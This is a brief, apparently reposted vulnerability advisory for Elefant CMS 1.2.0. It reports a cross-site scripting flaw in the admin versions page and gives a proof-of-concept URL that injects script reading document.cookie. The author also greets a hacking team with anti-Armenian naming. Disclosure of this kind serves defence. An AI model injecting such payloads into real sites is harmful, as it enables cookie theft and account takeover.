Elefant CMS version 1.2.0 suffers from a cross site scripting vulnerability.
7d633ca35dcdd51ec04d43ffc83bc31ba4e60aac4c2f13837b01cf53564b35cb===========================================================================
Author: PuN!Sh3r
Vulnerable Software: Elefant CMS 1.2.0
Official Site:http://http://www.elefantcms.com/download/
===========================================================================
Vuln Desc: Cross Site Script[Xss]
Vuln here:
http://localhost/admin/versions?id=[XSS]&type=Webpage
Proof of concept:
http://localhost/admin/versions?id=<script>alert(document.cookie)</script>&type=Webpage
Respect to All Azerbaijani BlackHatzzzz and Aanti-armenia.org&Anti-armenia Team
Thank you!
./PuN!Sh3r
===========================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed